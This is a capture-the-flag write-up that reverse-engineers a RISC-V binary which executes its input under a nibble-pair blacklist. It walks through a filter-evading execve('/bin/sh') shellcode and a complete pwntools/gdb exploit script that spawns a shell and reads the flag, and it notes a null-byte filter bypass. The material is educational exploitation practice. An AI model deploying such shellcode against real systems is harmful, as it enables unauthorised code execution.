Writeup by edoardo3512 for Risky Business

Binary

The given binary risky-business is a 64-bit, dynamically linked executable compiled for RISC-V.

$ file risky-business
risky-business: ELF 64-bit LSB pie executable, UCB RISC-V, RVC, double-float ABI, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-riscv64-lp64d.so.1, for GNU/Linux 4.15.0, BuildID[sha1]=2bb703ff4a5af43fb10e8ca4fd8a39b488a701f7, not stripped

$ checksec risky-business
[*] 'risky-business'
    Arch:       riscv64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

To execute it, we can install the RISC-V libraries with sudo apt install libc6-riscv64-cross and run it under QEMU with qemu-riscv64 -L /usr/riscv64-linux-gnu ./risky-business. Unfortunately this doesn't tell us much: the program just reads an input and exits without any output. So let's decompile it with Ghidra to see what it is doing.

Understanding the program

This is the main() function of the program, decompiled by Ghidra after I renamed the variables.

void main(void)

{
  int len;
  char next_nibble;
  int a;
  int b;
  uint i;
  char buffer [72];
  long canary;
  char previous_nibble;

  canary = ___stack_chk_guard;
  fgets(buffer,0x43,_stdin);
  len = strlen(buffer);
  a = len - 1;
  b = len - 2;
  previous_nibble = buffer[len + -1] >> 4;
  for (i = (len - 1) * 2; -1 < i; i--) {
    if ((i & 1) == 0) {
      next_nibble = buffer[a] & 0xf;
      a = a + -1;
    }
    else {
      next_nibble = buffer[b] >> 4;
      b = b + -1;
    }

    if ((((previous_nibble == 7) && (next_nibble == 3)) ||
        ((previous_nibble == 0 && (next_nibble == 0)))) ||
       ((previous_nibble == 0 && (next_nibble == 10)))) goto exit;
    previous_nibble = next_nibble;
  }
  (*(code *)buffer)(buffer);
exit:
  if (canary != ___stack_chk_guard) {
    exit(0);
  }
  return;
}

The program first reads up to 66 bytes of input (the size 0x43 includes the null terminator of the string). It then checks every pair of adjacent nibbles in our input and rejects the combinations 0x73, 0x00 and 0x0a. If the input passes the check, it is executed. So this is a shellcode challenge with a blacklist. If the restriction applied only to whole bytes, the check would mainly stop us from using a syscall instruction (ecall is b"\x73\x00\x00\x00") or from hardcoding /bin/sh in our input, because 0x73 is also the value of s. Unfortunately there are a few more complications, because the check also covers the nibble pairs that straddle two adjacent bytes. We will deal with that later.
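To make the rule concrete, here is a small Python sketch that mirrors the loop of main() nibble by nibble. The names passes_filter and passes_filter_hex are my own and do not come from the binary. The sketch assumes the input is passed without its terminating null byte. It treats bytes as unsigned, which matches plain char on RISC-V.

```python
BLACKLIST = {(0x7, 0x3), (0x0, 0x0), (0x0, 0xA)}


def passes_filter(buf: bytes) -> bool:
    """Mirror main(): walk the nibbles from the last byte backwards and
    reject any adjacent (previous, next) pair listed in BLACKLIST."""
    assert b"\x00" not in buf, "pass the input without its null terminator"
    n = len(buf)
    if n == 0:
        return True
    a, b = n - 1, n - 2
    previous = buf[n - 1] >> 4          # high nibble of the last byte
    for i in range(2 * (n - 1), -1, -1):
        if i % 2 == 0:                  # even step: low nibble of buf[a]
            nxt = buf[a] & 0xF
            a -= 1
        else:                           # odd step: high nibble of buf[b]
            nxt = buf[b] >> 4
            b -= 1
        if (previous, nxt) in BLACKLIST:
            return False
        previous = nxt
    return True


def passes_filter_hex(buf: bytes) -> bool:
    """Equivalent shortcut: the nibbles are visited in the order of the
    reversed buffer's hex string, so a substring test covers every pair."""
    nibbles = buf[::-1].hex()
    return not any(pair in nibbles for pair in ("73", "00", "0a"))


print(passes_filter(b"/bin/sh"))    # False: 's' is 0x73
print(passes_filter(b"\x31\x17"))   # False: no 0x73 byte, but 7|3 straddles two bytes
print(passes_filter(b"\x17\x31"))   # True
```

The second call shows why this check is stricter than a plain byte blacklist. The input \x31\x17 contains no 0x73 byte, yet the low nibble of 0x17 is compared with the high nibble of 0x31, and that forms a forbidden 7|3 pair. The reversed-hex shortcut is the same idea behind the nibble_string helper in the solve script.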

Because 0x0a is blacklisted, we must make sure that no \n ends up in the buffer after our shellcode. fgets stops after reading 66 bytes or a line terminator. If it reads the newline, the newline is stored in the string that gets checked, and the check fails. The intuitive solution is therefore to always send exactly as many bytes as fgets expects, so that the trailing newline is left unread.
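Here is a rough Python model of the fgets() behaviour described above. It is a sketch of the C semantics, not glibc's code, and fgets_model is a made-up name. It returns both what ends up in the buffer and what is left unread:

```python
def fgets_model(stream: bytes, size: int) -> tuple[bytes, bytes]:
    """Model fgets(buf, size, f): return (bytes stored in buf, bytes left in f).

    At most size - 1 bytes are read. Reading stops right after the first
    newline, which is kept in the buffer.
    """
    limit = size - 1
    end = stream.find(b"\n", 0, limit)   # only look inside the first size - 1 bytes
    taken = limit if end == -1 else end + 1
    return stream[:taken], stream[taken:]


SIZE = 0x43
buf, rest = fgets_model(b"A" * 66 + b"\n", SIZE)
print(len(buf), rest)        # 66 b'\n'  -> the newline stays in stdin
buf, rest = fgets_model(b"A" * 10 + b"\n", SIZE)
print(buf[-1:], rest)        # b'\n' b''  -> the newline lands in the checked buffer
```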

Another option is to terminate the shellcode ourselves with a null byte, so that the input ends with \x00\x0a and the program ignores the line terminator. While writing this explanation, though, I realised something I could have used to simplify the challenge a bit. Do you see it?

Think about what is being checked exactly.

Yes: the check expects the shellcode to be one continuous string. That seems intuitive, since we are calling the function “get a string from a file”. However, gets and fgets do not treat the null byte \x00 as a terminator; they stop only at the line terminator \x0a. The filter, on the other hand, measures the input with strlen(), which stops at the first \x00. This means that if an instruction near the beginning of the shellcode contained a null byte, we could write anything after it and it would never be checked. The only remaining constraint would be the length.

Since \x00 is usually THE byte to avoid in any shellcode, I really didn't think about this when solving the challenge. Still, I kinda love the idea of a constraint that almost forces us to use it at some point, and now I'm wondering whether it was intended. If you want some practice once you are done with this writeup, try to write your own shellcode this way ;-)
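Here is a quick Python sketch of the strlen() loophole. The payload layout is hypothetical: three filler bytes followed by \x00 stand in for an instruction whose encoding ends in a null byte. The filter applies the same nibble-pair rule as main(), but only to the part of the input that strlen() measures:

```python
def checked_part(line: bytes) -> bytes:
    # main() measures the input with strlen(), which stops at the first NUL
    return line.split(b"\x00", 1)[0]


def passes_filter(line: bytes) -> bool:
    # Same nibble-pair rule as main(), applied only to what strlen() sees
    nibbles = checked_part(line)[::-1].hex()
    return not any(pair in nibbles for pair in ("73", "00", "0a"))


# Hypothetical layout: filler bytes, a NUL, then data the filter never inspects
payload = (b"AAA\x00" + b"/bin/sh\x00" + b"\x73\x00\x00\x00").ljust(0x42, b"A")
print(passes_filter(payload))                              # True: only b"AAA" is checked
print(passes_filter(payload.replace(b"\x00", b"B", 1)))   # False: now /bin/sh is checked
```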

I also noticed that although checksec reports NX as enabled, a non-executable stack doesn't seem to be enforced. From what I found, it is standard for RISC-V, or at least when running under qemu-user, for the stack to be executable regardless of the NX flag, but I don't know enough about it (https://github.com/riscvarchive/riscv-glibc/issues/5).

Writing the shellcode

Since I had never worked with RISC-V before, I started from a generic shell-storm shellcode that calls execve("/bin/sh") without using the bytes 0x20, 0x0a and 0x00. Here is the specific shellcode I used, which is 76 bytes long:

|   entry0 ();
|           0x000100b0      0111           addi sp, sp, -32
|           0x000100b2      06ec           sd ra, 24(sp)
|           0x000100b4      22e8           sd s0, 16(sp)
|           0x000100b6      13042102       addi s0, sp, 34
|           0x000100ba      b767696e       lui a5, 0x6e696
|           0x000100be      9387f722       addi a5, a5, 559
|           0x000100c2      2330f4fe       sd a5, -32(s0)
|           0x000100c6      b7776810       lui a5, 0x10687
|           0x000100ca      33480801       xor a6, a6, a6
|           0x000100ce      0508           addi a6, a6, 1
|           0x000100d0      7208           slli a6, a6, 0x1c
|           0x000100d2      b3870741       sub a5, a5, a6
|           0x000100d6      9387f732       addi a5, a5, 815
|           0x000100da      2332f4fe       sd a5, -28(s0)
|           0x000100de      930704fe       addi a5, s0, -32
|           0x000100e2      0146           li a2, 0
|           0x000100e4      8145           li a1, 0
|           0x000100e6      3e85           mv a0, a5
|           0x000100e8      9308d00d       li a7, 221
|           0x000100ec      93063007       li a3, 115
|           0x000100f0      230ed1ee       sb a3, -260(sp)
|           0x000100f4      9306e1ef       addi a3, sp, -258
\           0x000100f8      6780e6ff       jr -2(a3)

Understanding the RISCV shellcode

Reading the shellcode I identified 4 main sections.

Firstly it creates a new frame on the stack for this “function” and stores the registers ra and s0 to preserve them, but this can easily be removed since we don’t need to preserve the state of the process.

|           0x000100b0      0111           addi sp, sp, -32  # sp = sp - 32
|           0x000100b2      06ec           sd ra, 24(sp)     # *(sp + 24) = ra
|           0x000100b4      22e8           sd s0, 16(sp)     # *(sp + 16) = s0
|           0x000100b6      13042102       addi s0, sp, 34   # s0 = sp + 34

Then it builds /bin and /sh\x00 in the register a5, stores the complete string /bin/sh\x00 on the stack and then loads the pointer to it into a5. a6 is used to compute the null terminator in /sh\x00 without having to put a null byte in the shellcode.

|           0x000100ba      b767696e       lui a5, 0x6e696   # a5 = 0x6e696000 [a5 = b"\x00`in"]
|           0x000100be      9387f722       addi a5, a5, 559  # a5 = a5 + 0x22f [a5 = b"/bin"]
|           0x000100c2      2330f4fe       sd a5, -32(s0)    # *(s0 - 32) = a5
|           0x000100c6      b7776810       lui a5, 0x10687   # a5 = 0x10687000 [a5 = b"\x00ph\x10"]
|           0x000100ca      33480801       xor a6, a6, a6    # a6 = 0x0
|           0x000100ce      0508           addi a6, a6, 1    # a6 = 0x1
|           0x000100d0      7208           slli a6, a6, 0x1c # a6 = 0x10000000
|           0x000100d2      b3870741       sub a5, a5, a6    # a5 = a5 - a6    [a5 = b"\x00ph\x00"]
|           0x000100d6      9387f732       addi a5, a5, 815  # a5 = a5 + 0x32f [a5 = b"/sh\x00"]
|           0x000100da      2332f4fe       sd a5, -28(s0)    # *(s0 - 28) = a5
|           0x000100de      930704fe       addi a5, s0, -32  # a5 = s0 - 32
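To convince myself the trick works, here is a Python sketch that replays these instructions on a 16-byte scratch buffer. The buffer, MASK64 and the lui helper are my own, written to model RV64 semantics. Offsets 0 and 4 in the buffer play the roles of -32(s0) and -28(s0). The sketch also shows why two 8-byte stores only 4 bytes apart are enough: the second sd overwrites the zero padding that the first one left after /bin.

```python
import struct

MASK64 = (1 << 64) - 1


def lui(imm20: int) -> int:
    """RV64 lui: imm20 << 12, sign-extended from 32 bits."""
    value = (imm20 << 12) & 0xFFFFFFFF
    if value & 0x80000000:
        value -= 1 << 32
    return value & MASK64


stack = bytearray(16)                   # offset 0 stands for s0 - 32

a5 = (lui(0x6E696) + 559) & MASK64      # 0x6e69622f -> b"/bin"
stack[0:8] = struct.pack("<Q", a5)      # sd a5, -32(s0)

a6 = 0                                  # xor a6, a6, a6
a6 = (a6 + 1) & MASK64                  # addi a6, a6, 1
a6 = (a6 << 0x1C) & MASK64              # slli a6, a6, 0x1c -> 0x10000000
a5 = (lui(0x10687) - a6) & MASK64       # sub a5, a5, a6    -> 0x00687000
a5 = (a5 + 815) & MASK64                # addi a5, a5, 815  -> 0x0068732f
stack[4:12] = struct.pack("<Q", a5)     # sd a5, -28(s0), overlapping the first store

print(bytes(stack[0:8]))                # b'/bin/sh\x00'
```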

Next it loads all the arguments for the syscall execve("/bin/sh\x00", 0, 0), where a7 is used for the syscall code while a0 to a2 are the arguments.

|           0x000100e2      0146           li a2, 0          # args[2] = 0
|           0x000100e4      8145           li a1, 0          # args[1] = 0
|           0x000100e6      3e85           mv a0, a5         # args[0] = &bin_sh
|           0x000100e8      9308d00d       li a7, 221        # sys_execve

Finally, since the ecall instruction also contains null bytes, this shellcode builds its first byte (0x73) in a3, stores it on the stack with sb (the stack, remember, is executable) and then jumps to it. Only that single byte is written, so the shellcode relies on the three bytes after it already being zero. It also has to jump to an offset from the register rather than to the register itself, to avoid instructions containing a null byte. (jr 0(a3) would contain a null byte because of the offset 0x00, while jalr xx, a3 has a null byte in the instruction itself.)

|           0x000100ec      93063007       li a3, 115        # a3 = 0x0000000073
|           0x000100f0      230ed1ee       sb a3, -260(sp)   # *(sp - 260) = a3
|           0x000100f4      9306e1ef       addi a3, sp, -258 # a3 = sp - 258
\           0x000100f8      6780e6ff       jr -2(a3)         # jump (a3 - 2)
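Here is a short Python check of the two facts this trick relies on. It assumes, as the code implies because sb writes a single byte, that the three stack bytes after the stored 0x73 are already zero. The stack pointer value is only an example:

```python
import struct

ECALL = 0x00000073                      # ecall: SYSTEM opcode, all other fields zero
print(struct.pack("<I", ECALL))         # b's\x00\x00\x00'

a3 = 115                                # li a3, 115
written = (a3 & 0xFF).to_bytes(1, "little")   # sb stores only the low byte of a3
# The jump only lands on an ecall if the next 3 bytes are already zero
print(written + b"\x00" * 3 == struct.pack("<I", ECALL))   # True

sp = 0x4001802EA0                       # example value; the arithmetic holds for any sp
store_addr = sp - 260                   # sb a3, -260(sp)
a3 = sp - 258                           # addi a3, sp, -258
jump_target = a3 - 2                    # jr -2(a3)
print(jump_target == store_addr)        # True
```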

Simplify the shellcode

To use this shellcode we have two problems to solve. First, it is too long for our challenge: 76 bytes, against the 66 that fgets reads. Second, as we will soon see, it contains a few nibble pairs that are not allowed.

We can start by removing the part of the shellcode that sets up the new stack frame. Then we focus on making the shellcode valid, and only after that look into shortening it further if needed. I will start by cutting the first 4 instructions and using sp directly instead of s0 when storing b"/bin/sh\x00" on the stack.

   0:   6e6967b7   lui     a5, 0x6e696
   4:   22f78793   addi    a5, a5, 559
   8:   fef13023   sd      a5, -32(sp)
   c:   106877b7   lui     a5, 0x10687
  10:   01084833   xor     a6, a6, a6
  14:   0805       addi    a6, a6, 1
  16:   0872       slli    a6, a6, 0x1c
  18:   410787b3   sub     a5, a5, a6
  1c:   32f78793   addi    a5, a5, 815
  20:   fef13223   sd      a5, -28(sp)
  24:   fe010793   addi    a5, sp, -32
  28:   4601       li      a2, 0
  2a:   4581       li      a1, 0
  2c:   853e       mv      a0, a5
  2e:   0dd00893   li      a7, 221
  32:   07300693   li      a3, 115
  36:   eed10e23   sb      a3, -260(sp)
  3a:   efe10693   addi    a3, sp, -258
  3e:   ffe68067   jr      -2(a3)

You may notice that the byte representation of the instructions is different. This is a change in endianness between how shell-storm shows them and how pwntools' disasm() (pwnlib.asm.disasm), which I'm using here, prints them. The latter representation is actually better for this challenge, because it matches the order in which the nibble pairs are checked. The new shellcode is exactly 66 bytes long, but li a7, 221 and li a3, 115 both contain a 00 pair, and li a3, 115 also contains a 73 pair.
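To double-check which instructions trip the filter, we can rebuild the bytes from the words in the listing above and scan them. The Python sketch below does that. The word list is copied from the disasm() output, and BAD and offending are my own names:

```python
# Instruction words as printed by disasm() above, in program order
words = [
    "6e6967b7", "22f78793", "fef13023", "106877b7", "01084833", "0805", "0872",
    "410787b3", "32f78793", "fef13223", "fe010793", "4601", "4581", "853e",
    "0dd00893", "07300693", "eed10e23", "efe10693", "ffe68067",
]
BAD = ("73", "00", "0a")

# disasm() prints each word most-significant byte first; reverse it to get memory order
shellcode = b"".join(bytes.fromhex(w)[::-1] for w in words)
print(len(shellcode))                                   # 66

# main() walks the buffer backwards, so it sees the words in reverse program order
assert shellcode[::-1].hex() == "".join(reversed(words))

offending = [w for w in words if any(p in w for p in BAD)]
print(offending)                                        # ['0dd00893', '07300693']
```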

To solve this problem we can do some math instead of loading 221 into a7 directly. Since 221 = 13 × 17, we can load our register with:

  2e:   4335       li      t1, 13
  30:   42c5       li      t0, 17
  32:   026288b3   mul     a7, t0, t1

Then, for a3, we just add an offset to the value we just computed in a7.

  36:   f9688693   addi    a3, a7, 115 - 221
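Here is a small Python sanity check of the arithmetic and of the new encodings. It uses a hypothetical decode_itype helper that splits a 32-bit instruction according to the standard RISC-V I-type field layout. The words come from the two snippets above:

```python
BAD = ("73", "00", "0a")
ABI = {13: "a3", 15: "a5", 17: "a7"}    # x-number -> ABI name, only what is needed here


def decode_itype(word: int) -> tuple[int, int, int, int]:
    """Split a 32-bit RISC-V I-type word into (rd, funct3, rs1, imm)."""
    rd = (word >> 7) & 0x1F
    funct3 = (word >> 12) & 0x7
    rs1 = (word >> 15) & 0x1F
    imm = word >> 20                    # 12-bit immediate in two's complement
    if imm & 0x800:
        imm -= 0x1000
    return rd, funct3, rs1, imm


# 221 = 13 * 17, and the addi offset turns a7 (221) into the 115 that a3 needs
assert 13 * 17 == 221 and 221 + (115 - 221) == 115

new_words = ["4335", "42c5", "026288b3", "f9688693"]   # li t1, li t0, mul, addi
print([w for w in new_words if any(p in w for p in BAD)])   # []

rd, funct3, rs1, imm = decode_itype(0xF9688693)
print(ABI[rd], ABI[rs1], funct3, imm)   # a3 a7 0 -106  (funct3 0 with opcode 0x13 is addi)
```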

Unfortunately the shellcode is now 70 bytes long, so it is too long again and we will have to modify it further. I was not confident I wouldn't break it by accident (spoiler: I did, a few times…), so let's first make sure that it keeps working. Skip the next section if you just want to get to the solution.

Make sure the shellcode is always correct

This script first checks that the shellcode contains no blacklisted nibble pairs. It then runs the program and changes the size argument of fgets at runtime, so that the whole shellcode is read even while it is still too long. If execution reaches execve("/bin/sh\x00", NULL, NULL), we know the current version of the shellcode is correct and only needs to be shortened. If not, we can pinpoint which instruction didn't behave as expected. I will not go through all the mistakes I made while writing the shellcode, but at least here is how I found them.

To debug programs emulated with QEMU, remember that you first need to install gdb-multiarch and make the RISC-V libraries available to QEMU with sudo ln -s /usr/riscv64-linux-gnu/ /etc/qemu-binfmt/riscv64.

from gdb_plus import *

binary_name = "risky-business"

# Make sure to set the context so that pwntools will use gdb-multiarch to debug the program
exe  = ELF(binary_name, checksec=True)
context.binary = exe

# Already set up the IP of the server for when we want to get the flag
HOST = "127.0.0.1"
PORT = 4000
dbg = Debugger(f"./{binary_name}", aslr=False).remote(HOST, PORT)

shellcode = asm("""
lui a5, 0x6e696
addi a5, a5, 559
sd a5, -32(sp)
lui a5, 0x10687
xor a6, a6, a6
addi a6, a6, 1
slli a6, a6, 0x1c
sub a5, a5, a6
addi a5, a5, 815
sd a5, -28(sp)
addi a5, sp, -32
li a2, 0
li a1, 0
mv a0, a5
li t1, 13
li  t0, 17
mul a7, t0, t1
addi a3, a7, 115 - 221
sb a3, -260(sp)
addi a3, sp, -258
jr -2(a3)
""").ljust(0x42, b"A")

# Make sure the shellcode respects the blacklist
def nibble_string(shellcode):
    # main() walks the input backwards, so the nibble pairs it checks are
    # exactly the adjacent hex digits of the reversed shellcode
    return shellcode[::-1].hex()

assert "73" not in nibble_string(shellcode)
assert "0a" not in nibble_string(shellcode)
assert "00" not in nibble_string(shellcode)
log.success("The shellcode is valid!")

# Change the argument of fgets to the length of our payload
def extend_read(dbg):
    size = dbg.args[1]
    if len(shellcode) >= size:
        log.warn(f"Your shellcode is still too long! {len(shellcode)}/{size - 1}")
        dbg.args[1] = len(shellcode) + 1 # Overwrite the argument
    return False # Tell gdb to not stop after executing the callback
dbg.b("fgets", callback=extend_read)

CALL_SHELLCODE = 0x896 # Address taken from ghidra
dbg.until(CALL_SHELLCODE, wait=False) # Let the program run until it jumps to the shellcode
dbg.p.sendline(shellcode)

If we then step through the shellcode with GDB, we reach the expected syscall:

 ► 0x4001802d9c    ecall   <SYS_execve>
        path: 0x4001802e80 ◂— 0x68732f6e69622f /* '/bin/sh' */
        argv: 0
        envp: 0

We can also automate this check, so that running the script immediately tells us whether the shellcode still works, without stepping through it manually in GDB.

...
CALL_SHELLCODE = 0x896
done = dbg.until(CALL_SHELLCODE, wait=False)
dbg.p.sendline(shellcode)
if args.QUICK: # We define a new argument for when to enter this loop
  done.wait() # Wait for the program to reach the breakpoint
  try:
    dbg.until(dbg.sp - 260, hw=True) # Hardware breakpoint: our shellcode overwrites this address, so a software breakpoint would not work.
    assert dbg.next_inst.mnemonic == "ecall"
    assert dbg.read_string(dbg.syscall_args[0]) == b"/bin/sh"
    assert dbg.syscall_args[1] == 0
    assert dbg.syscall_args[2] == 0
  except Exception:
    log.error("The shellcode is wrong! Check manually where it messed up.")
  log.success("The shellcode is still right! You can go on.")
  dbg.close()

$ python3 ./solve.py QUICK
[+] Starting local process '/usr/bin/qemu-riscv64': pid 51087
[+] The shellcode is valid!
[!] Your shellcode is still too long! 70/66
[+] The shellcode is still right! You can go on.
[*] Stopped process './risky-business' (pid 51087)

Find 4 more bytes to remove

We can continue to optimise the shellcode. The first thing to notice is that it stores the pointer to b"/bin/sh\x00" in a5 and then moves it into a0, while we could compute it directly into a0. This removes 2 bytes. My second optimisation came from the length of xor a6, a6, a6, which is 4 bytes long, while li a2, 0 is only 2 bytes long. One option is to use li a6, 0, which is also 2 bytes long. The other is to use one of the registers that compressed instructions such as c.xor and c.sub can encode (x8 to x15, i.e. s0, s1 and a0 to a5), for example a1. That would have removed 2 bytes from both the xor and the sub a5, a5, a6.

   0:   6e6967b7   lui     a5, 0x6e696
   4:   22f78793   addi    a5, a5, 559
   8:   fef13023   sd      a5, -32(sp)
   c:   106877b7   lui     a5, 0x10687
  10:   4801       li      a6, 0
  12:   0805       addi    a6, a6, 1
  14:   0872       slli    a6, a6, 0x1c
  16:   410787b3   sub     a5, a5, a6
  1a:   32f78793   addi    a5, a5, 815
  1e:   fef13223   sd      a5, -28(sp)
  22:   fe010513   addi    a0, sp, -32
  26:   4601       li      a2, 0
  28:   4581       li      a1, 0
  2a:   4335       li      t1, 13
  2c:   42c5       li      t0, 17
  2e:   026288b3   mul     a7, t0, t1
  32:   f9688693   addi    a3, a7, -106
  36:   eed10e23   sb      a3, -260(sp)
  3a:   efe10693   addi    a3, sp, -258
  3e:   ffe68067   jr      -2(a3)
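The reason a1 helps while a6 does not is the RVC encoding. CA-format compressed instructions such as c.xor and c.sub only have 3-bit register fields, so they can only name x8 to x15. Here is a tiny Python sketch of that rule. The register table only covers registers used in this writeup. The sketch also assumes rd == rs1, as those compressed forms require.

```python
# ABI name -> x-register number (only the registers used in this writeup)
X = {"sp": 2, "t0": 5, "t1": 6, "s0": 8, "s1": 9,
     "a0": 10, "a1": 11, "a2": 12, "a3": 13, "a4": 14, "a5": 15,
     "a6": 16, "a7": 17}


def fits_rvc_ca(reg: str) -> bool:
    """CA-format compressed ops (c.sub, c.xor, c.or, c.and) use 3-bit
    register fields, which can only name x8..x15."""
    return 8 <= X[reg] <= 15


# (rd == rs1, rs2) pairs for xor a6/a1 and sub a5, a5, a6/a1
for rd, rs2 in [("a6", "a6"), ("a1", "a1"), ("a5", "a6"), ("a5", "a1")]:
    size = 2 if fits_rvc_ca(rd) and fits_rvc_ca(rs2) else 4
    print(rd, rs2, size, "bytes")
```

c.li, on the other hand, has a full 5-bit rd field. That is why li a6, 0 still fits in 2 bytes.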

But now, can you see an even simpler way to shorten the shellcode, one that I missed while solving the challenge?

Quiz moment! Here is the solution.

Of course, we can use a shift instruction to create the null byte in /sh\x00 instead of wasting 10 bytes on a6. You just have to be careful not to load 0x68732 directly with lui, because the s of sh is still blacklisted. Since we need an addi instruction for the low bits anyway, we can freely choose the last 12 bits of the shifted value and let the addi make up the difference.

   c:   687117b7   lui     a5, 0x68711   # a5 = 0x68711000
  10:   83a1       srli    a5, a5, 0x8   # a5 = 0x00687110
  12:   21f78793   addi    a5, a5, 0x21f # a5 = 0x0068732f
  16:   fef13223   sd      a5, -28(sp)

Alternatively, you can compute 0x0068732f as a5 - 0x6e00ef00, reusing the /bin value 0x6e69622f still held in a5, but I don't like the number of null bytes there.
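Both alternatives are easy to verify in Python. This is a plain arithmetic sketch. The instruction words are the ones from the snippet above, and lui needs no sign extension here because bit 31 of 0x68711000 is clear:

```python
BAD = ("73", "00", "0a")

# Shift trick: lui a5, 0x68711 ; srli a5, a5, 8 ; addi a5, a5, 0x21f
a5 = 0x68711 << 12          # lui
a5 >>= 8                    # srli
a5 += 0x21F                 # addi
print(hex(a5))              # 0x68732f

# Loading 0x68732 directly would put a 7|3 pair in the lui immediate
print("73" in f"{0x68732:05x}")                      # True
print([w for w in ("687117b7", "83a1", "21f78793")
       if any(p in w for p in BAD)])                 # []

# Alternative: subtract from the /bin value still held in a5
print(hex(0x6E69622F - 0x6E00EF00))                  # 0x68732f
```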

Execute final exploit

from gdb_plus import *

binary_name = "risky-business"

exe  = ELF(binary_name, checksec=True)
context.binary = exe

IP = "127.0.0.1"
PORT = 4000
dbg = Debugger(f"./{binary_name}", aslr=False).remote(IP, PORT)

shellcode = asm("""
lui     a5, 0x6e696
addi    a5, a5, 559 # 0x6e69622f
sd      a5, -32(sp)
lui     a5, 0x10687
li      a6, 0
addi    a6, a6, 1
slli    a6, a6, 0x1c
sub     a5, a5, a6
addi    a5, a5, 815 # 0x0068732f
sd      a5, -28(sp)
addi    a0, sp, -32
li      a2, 0
li      a1, 0
li      t1, 13
li      t0, 17
mul     a7, t0, t1
addi    a3, a7, -106
sb      a3, -260(sp)
addi    a3, sp, -258
jr      -2(a3)
""").ljust(0x42, b"A")

def nibble_string(shellcode):
    # Nibbles in the order main() checks them: the reversed shellcode's hex
    return shellcode[::-1].hex()

assert "73" not in nibble_string(shellcode)
assert "0a" not in nibble_string(shellcode)
assert "00" not in nibble_string(shellcode)
log.success("The shellcode is valid!")

def extend_read(dbg):
    size = dbg.args[1]
    if len(shellcode) >= size:
        log.warn(f"Your shellcode is still too long! {len(shellcode)}/{size - 1}")
        dbg.args[1] = len(shellcode) + 1
    return False
dbg.b("fgets", callback=extend_read)

CALL_SHELLCODE = 0x896
done = dbg.until(CALL_SHELLCODE, wait=False)
dbg.p.sendline(shellcode)

if args.QUICK:
  done.wait()
  try:
    dbg.until(dbg.sp - 260, hw=True)
    assert dbg.next_inst.mnemonic == "ecall"
    assert dbg.read_string(dbg.syscall_args[0]) == b"/bin/sh"
    assert dbg.syscall_args[1] == 0
    assert dbg.syscall_args[2] == 0
  except Exception:
    log.error("The shellcode is wrong! Check manually where it messed up.")
  log.success("The shellcode is still right! You can go on.")
  dbg.close()

sleep(0.1) # Give the shellcode time to spawn the shell
dbg.p.sendline(b"cat flag.txt")
flag = dbg.p.recvline().decode()
log.success(f"FLAG: {flag}") # You won <3

And the exploit works both locally

$ python3 ./solve.py NOPTRACE
[+] Starting local process './risky-business': pid 25461
[+] The shellcode is valid!
[!] Debug is off, gdb commands won't be executed
[+] FLAG: test_flag{solved}
[*] Stopped process './risky-business' (pid 25461)

and remotely

$ python3 ./solve.py REMOTE
[+] Opening connection to 127.0.0.1 on port 4000: Done
[+] The shellcode is valid!
[!] Debug is off, gdb commands won't be executed
[+] FLAG: <REDACTED>
[*] Closed connection to 127.0.0.1 port 4000

Challenge solved! We saw how to write a simple RISC-V shellcode, and that the stack may be executable. I also relearned that fgets has no problem at all reading null bytes, although it is high time I remembered it…

Your turn now!